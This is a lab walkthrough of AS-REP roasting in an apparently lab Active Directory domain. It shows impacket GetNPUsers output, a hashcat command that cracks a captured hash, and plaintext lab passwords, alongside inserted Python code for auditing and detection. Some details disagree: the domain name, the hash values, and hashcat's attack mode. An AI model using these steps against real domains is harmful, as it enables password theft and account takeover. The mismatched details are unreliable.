# Exploiting Username - ASREPRoast

The ASREPRoast attack looks for **users without the "Kerberos pre-authentication required" attribute** ([DONT\_REQ\_PREAUTH](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro)).

That means that anyone can send an AS\_REQ to the DC on behalf of any of those users and receive an AS\_REP. That message contains a chunk of data encrypted with the user's key, which is derived from the user's password, so the password can be cracked offline from that message alone.

Furthermore, **no domain account is needed to perform this attack**, only a connection to the DC. However, **with a domain account**, an LDAP query can be used to **retrieve the users without Kerberos pre-authentication** in the domain. **Otherwise, usernames have to be guessed**.
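The LDAP query mentioned above is the same one a defender runs to audit the domain for accounts with the flag set. The following is an added example (not code from the original page) that builds that filter and classifies account records from the audit side, with the value to write back to turn pre-authentication on again; the userAccountControl bit values and the matching-rule OID are the real ones, while the account records it runs over are constructed so it works offline.

```python
"""Audit for AS-REP roastable accounts (the DONT_REQ_PREAUTH flag).

Added example, not code from the original page. The userAccountControl bit
values and the LDAP bitwise-AND matching rule OID are the real ones; the
account records below are constructed so the audit runs offline. To audit
a live domain, run roastable_filter() through your own LDAP client (for
example ldapsearch or Get-ADUser -LDAPFilter) and feed the results to audit().
"""

# userAccountControl bits, from the Microsoft useraccountcontrol flag table
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_REQUIRE_PREAUTH = 0x400000   # 4194304: the KDC answers an AS_REQ with no pre-auth

# LDAP_MATCHING_RULE_BIT_AND: matches entries whose attribute has the given bit set
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def base_dn(domain):
    """'north.newyork.local' -> 'DC=north,DC=newyork,DC=local'."""
    return ",".join("DC=%s" % label for label in domain.split("."))


def roastable_filter():
    """LDAP filter selecting user objects that do not require pre-authentication."""
    return ("(&(objectCategory=person)(objectClass=user)"
            "(userAccountControl:%s:=%d))"
            % (LDAP_MATCHING_RULE_BIT_AND, UF_DONT_REQUIRE_PREAUTH))


def classify(account):
    """'roastable', 'disabled' or 'ok' for one {sAMAccountName, userAccountControl} record."""
    uac = account["userAccountControl"]
    if not uac & UF_DONT_REQUIRE_PREAUTH:
        return "ok"
    # A disabled account keeps the flag, but the KDC refuses its AS_REQ with
    # KDC_ERR_CLIENT_REVOKED (the error GetNPUsers prints for the disabled
    # krbtgt account), so it is only roastable again once re-enabled. Fix it anyway.
    if uac & UF_ACCOUNTDISABLE:
        return "disabled"
    return "roastable"


def audit(accounts):
    """Group account records by classification, preserving input order."""
    report = {"roastable": [], "disabled": [], "ok": []}
    for account in accounts:
        report[classify(account)].append(account["sAMAccountName"])
    return report


def remediated_uac(uac):
    """The userAccountControl value to write back: same flags, pre-auth required again."""
    return uac & ~UF_DONT_REQUIRE_PREAUTH


# Constructed sample records (not real directory data)
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "Administrator", "userAccountControl": UF_NORMAL_ACCOUNT},
    {"sAMAccountName": "claudio.ortiz",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "legacy_svc",  # constructed: flag set but account disabled
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "sql_svc", "userAccountControl": UF_NORMAL_ACCOUNT},
]

if __name__ == "__main__":
    print("search base:", base_dn("north.newyork.local"))
    print("filter     :", roastable_filter())
    for kind, names in audit(SAMPLE_ACCOUNTS).items():
        print("%-9s %s" % (kind, ", ".join(names) or "-"))
    for account in SAMPLE_ACCOUNTS:
        if classify(account) != "ok":
            uac = account["userAccountControl"]
            print("fix %s: userAccountControl 0x%X -> 0x%X"
                  % (account["sAMAccountName"], uac, remediated_uac(uac)))
```

Disabled accounts are reported separately because, as the GetNPUsers output on this page shows, the KDC answers them with KDC_ERR_CLIENT_REVOKED rather than an AS-REP; they still carry the flag and become roastable the moment someone re-enables them, so the audit lists them for remediation too.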

#### ASREP - roasting <a href="#asrep---roasting" id="asrep---roasting"></a>

We create a users.txt file with all the user names previously found on north.sevenkingdoms.local:

```
cat users.txt

Administrator
vagrant
krbtgt
newyork$
pablo.Sandoval
fernando.Alonzo
valentino.alcantara
matias.Almonte
alejandro.Rodriguez
claudio.Ortiz
salvador.Aguilar
pacofish
elena.Lopez
miguel.Cabrera
joel.exposito
sql_svc
```

We can now try AS-REP roasting on all of the users with impacket's GetNPUsers.py:

```
GetNPUsers.py north.newyork.local/ -no-pass -usersfile users.txt
Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra


[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User vagrant doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User newyork$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pablo.Sandoval doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fernando.Alonzo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User valentino.alcantara doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User matias.Almonte doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User alejandro.Rodriguez doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$claudio.Ortiz@NORTH.NEWYORK.LOCAL:da4d51f644d3ecb45e27f06ece85208a$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
[-] User salvador.Aguilar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pacofish doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User elena.Lopez doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User miguel.Cabrera doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User joel.exposito doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
```
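The run above does not go unnoticed on the DC: every AS\_REQ it sends is audited as Security event 4768, and the one account that handed out an AS-REP did so with a pre-authentication type of 0. The following is an added detection example, not code from the original page: it parses constructed one-line summaries of 4768 fields (not a real log export; the field names and codes are the real ones) and flags both the pre-auth-less TGTs and the source that combined such a TGT with a request for a revoked account, the trace a username-list sweep like this one leaves behind.

```python
"""Detection-side view of an AS-REP roasting sweep.

Added example, not code from the original page. Every AS_REQ the tool sends
is audited by the DC as Security event 4768 (a Kerberos authentication
ticket was requested). The sample lines below are constructed one-line
summaries of 4768 fields, not a real log export; the field names and codes
are the real ones: PreAuthType 0 means the TGT was issued with no
pre-authentication, TicketEncryptionType 0x17 is RC4-HMAC (the etype 23
in the $krb5asrep$23$ line above), Status 0x12 is KDC_ERR_CLIENT_REVOKED.
"""
from datetime import datetime, timedelta

RC4_HMAC = 0x17
KDC_ERR_CLIENT_REVOKED = 0x12

# Constructed sample: a sweep from 192.168.56.50 (only the account without
# pre-auth yields a TGT; the disabled krbtgt account is refused; accounts that
# require pre-auth never complete, so no success event exists for them),
# plus normal logons from other hosts.
SAMPLE_4768 = """\
2023-02-22T08:30:01 TargetUserName=krbtgt IpAddress=::ffff:192.168.56.50 PreAuthType=- TicketEncryptionType=0xffffffff Status=0x12
2023-02-22T08:30:02 TargetUserName=claudio.Ortiz IpAddress=::ffff:192.168.56.50 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0
2023-02-22T08:31:15 TargetUserName=vagrant IpAddress=::ffff:192.168.56.10 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0
2023-02-22T09:15:40 TargetUserName=elena.Lopez IpAddress=::ffff:192.168.56.21 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0
"""


def parse_event(line):
    """Turn one constructed '<timestamp> key=value ...' line into a dict."""
    stamp, _, rest = line.partition(" ")
    fields = dict(item.split("=", 1) for item in rest.split())
    return {
        "time": datetime.fromisoformat(stamp),
        "user": fields["TargetUserName"],
        "ip": fields["IpAddress"],
        # 4768 failure events carry '-' instead of a pre-auth type
        "preauth": None if fields["PreAuthType"] == "-" else int(fields["PreAuthType"]),
        "etype": int(fields["TicketEncryptionType"], 16),
        "status": int(fields["Status"], 16),
    }


def parse_events(text):
    return [parse_event(line) for line in text.splitlines() if line.strip()]


def no_preauth_tgts(events):
    """TGTs issued without any pre-authentication: each one is crackable
    offline by whoever requested it. Returns (user, source ip, rc4 flag)."""
    return [(e["user"], e["ip"], e["etype"] == RC4_HMAC)
            for e in events if e["status"] == 0 and e["preauth"] == 0]


def suspicious_sources(events, window=timedelta(seconds=60)):
    """Sources that obtained a pre-auth-less TGT and, within `window`, also
    tripped over a revoked account: the trace a username-list sweep leaves."""
    revoked = [e for e in events if e["status"] == KDC_ERR_CLIENT_REVOKED]
    flagged = set()
    for hit in events:
        if hit["status"] != 0 or hit["preauth"] != 0:
            continue
        for miss in revoked:
            if miss["ip"] == hit["ip"] and abs(miss["time"] - hit["time"]) <= window:
                flagged.add(hit["ip"])
    return sorted(flagged)


if __name__ == "__main__":
    events = parse_events(SAMPLE_4768)
    for user, ip, rc4 in no_preauth_tgts(events):
        print("no-preauth TGT for %s from %s%s" % (user, ip, " (RC4)" if rc4 else ""))
    print("sources to investigate:", suspicious_sources(events))
```

The RC4 flag matters because the `$krb5asrep$23$` hash on this page is exactly the etype 23 (RC4-HMAC) form; a 4768 with pre-authentication type 0 and encryption type 0x17 is the log-side signature of that hash being handed out.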

* We got an AS-REP hash for claudio.ortiz, because that user does not require Kerberos pre-authentication; we will now try to crack it.
* This needs to be done on your local machine.

```
#move rockyou.txt.gz to your current directory
sudo mv /usr/share/wordlists/rockyou.txt.gz .

#unzip rockyou.txt.gz
gzip -d rockyou.txt.gz

#let's start cracking
hashcat -m 18200 '$krb5asrep$23$claudio.Ortiz@NORTH.NEWYORK.LOCAL:8e75978f6243551a3faf9c5632763627$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' -a 3 rockyou.txt

-m = is the mode (18200 | Kerberos 5, etype 23, AS-REP)
-a = --attack-mode = (0 | Straight, 1 | Combination, 3 | Brute-force, 6 | Hybrid Wordlist + Mask, 7 | Hybrid Mask + Wordlist)


$krb5asrep$23$claudio.Ortiz@NORTH.NEWYORK.LOCAL:8e75978f6243551a3faf9c5632763627$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:babyboy

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$claudio.Ortiz@NORTH.NEWYORK.LOCAL:8e7...121306
Time.Started.....: Wed Feb 22 08:32:49 2023 (0 secs)
Time.Estimated...: Wed Feb 22 08:32:49 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: babyboy [7]
Guess.Queue......: 286/14336793 (0.00%)
Speed.#1.........:    10958 H/s (0.01ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: babyboy -> babyboy
Hardware.Mon.#1..: Util: 46%

Started: Wed Feb 22 08:32:23 2023
Stopped: Wed Feb 22 08:32:50 2023
```

We now have two sets of credentials:

```
miguel.cabrera = ilovebaseball
claudio.ortiz = babyboy
```

